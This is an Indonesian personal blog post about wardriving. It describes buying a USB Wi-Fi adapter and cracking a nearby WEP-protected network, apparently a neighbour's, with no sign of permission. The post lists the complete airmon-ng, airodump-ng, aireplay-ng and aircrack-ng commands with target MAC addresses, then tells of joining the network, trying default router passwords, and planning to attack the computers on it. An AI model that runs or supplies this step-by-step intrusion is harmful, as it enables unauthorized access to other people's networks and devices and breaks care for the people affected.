Wardriving in action

Well, Long time no touch my blog.. I'm not dead yet, just being invisible...

Sudah lama saya tidak mengupdate blog ini, alasan waktu-lah yang membuat saya tidak bisa mengupdate blog ini. Sempat juga saya berfikir untuk menonaktifkan blog ini, namun hal itu saya urungkan setelah membaca beberapa comments yang ditnggalkan oleh beberapa pembaca blog ini. Surprised juga, ternyata ada juga yang mengunjungi blog ini :).


OK, sekarang saya mau berbagi pengalaman seputar Wardriving. Apa itu wardriving? Wah sepertinya google lebih pantas menjawabnya.

Bagi temen-temen yang mengikuti perkembangan saya di Twitter, beberapa pekan yang lalu saya hunting USB Wireless Adapter. Dan setelah merujuk dari beberapa referensi pilihan jatuh ke TP LINK WN422G v.1.1. Berikut sedikit spesifikasinya:
  • USB 2.0, portable and flexible
  • Supports Ad-Hoc/Infrastructure modes
  • Supports 54/48/36/24/18/12/9/6Mbps or 11/5.5/2/1Mbps data transfer rates
  • Provides soft AP Mode, and PSP connection*
  • Supports WEP encryptions, as well as
  • WPA/WPA2 and WPA-PSK/WPA2-PSK encryptions and mechanisms
  • Supports Windows 2000, XP, Vista
  • 4dBi high-gain antenna attached (detachable)
  • Chipset Zydas zd1411rw (Backtrack Ready, mode: infrastructure, repeater, monitor, packet injection support)


Memang kalau dibandingkan dengan WN422G v.2.0, WN422G v.1.1 harganya relatif lebih mahal dan susah didapatkan di toko-toko. Saya sempat hunting ke banyak toko di Jogja dan akhirnya nemu di pameran Apkomindo kemaren. Stok terakhid. Harga Rp. 174.000,- tapi sebanding dengan yang didapat :)..

Nah, rencananya saya mau buat antena external dengan target gain > 9dbi, sudah belanja untuk buat pigtail dan antena, tapi iseng coba tanpa modifikasi eh ternyata bisa connect dengan jaringan wifi di sekitar rumah, meski sinyal terukur 2 bar dan jaringan terproteksi menggunakan WEP.

Awalnya sih coba-coba uji ilmu, saya luncurkan konsole dari Slackware 13. Saya aktifkan mode monitor menggunakan program airmon-ng, kemudian saya jalankan kismet. Yupz, terdeteksi sebuah jaringan terproteksi WEP berjalan pada channel 6.

akhyariz@bl4ck-b0x:~$ sudo airmon-ng start wlan0
Interface       Chipset         Driver
wlan0           ZyDAS 1211      zd1211rw - [phy6]
                                (monitor mode enabled on mon0)

 Nah, sampai di sini keisengan saya belum selesai, saya segera luncurkan beberapa konsole lain untuk menjalankan airodump-ng untuk menangkap paket data, aireplay-ng untuk meng-generate paket dan aircrack-ng untuk memecahkan enkripsi WEP.

Berikut langkah kerjanya:
  1. Menangkap paket data: sudo airodump-ng mon0 -c 6 -w wep.cap
  2. Melakukan asosiasi dengan Access point: sudo aireplay-ng -1 -a 00:25:86:B7:82:75 -c 00:23:cd:bb:a3:4c
  3. Mengirimkan paket arp request: sudo aireplay-ng -3 0 -a 00:25:86:B7:82:75 -c 00:23:cd:bb:a3:4c mon0
  4. Memecahkan enkripsi WEP: aircrack-ng -b 00:25:86:B7:82:75 wep.cap

Dan violaaa...WEP Key diperoleh. Selanjutnya, tinggal melakukan koneksi ke jaringan tersebut. Saya menggunakan Wireless Assistant untuk mendapatkan akses ke jaringan. Dan ternyata, jaringan ini terhubung ke internet menggunakan modem Huawei smartAX dengan koneksi ADSL Telkom Speedy.

OK sampai disini dulu, karena usaha untuk menguasai router/modem ADSL dengan menggunakan default password gagal. :( tapi tunggu dulu...mungkin saya bisa melakukan gaining komputer-komputer di jariangan ini..kita lihat saja nanti.

Comments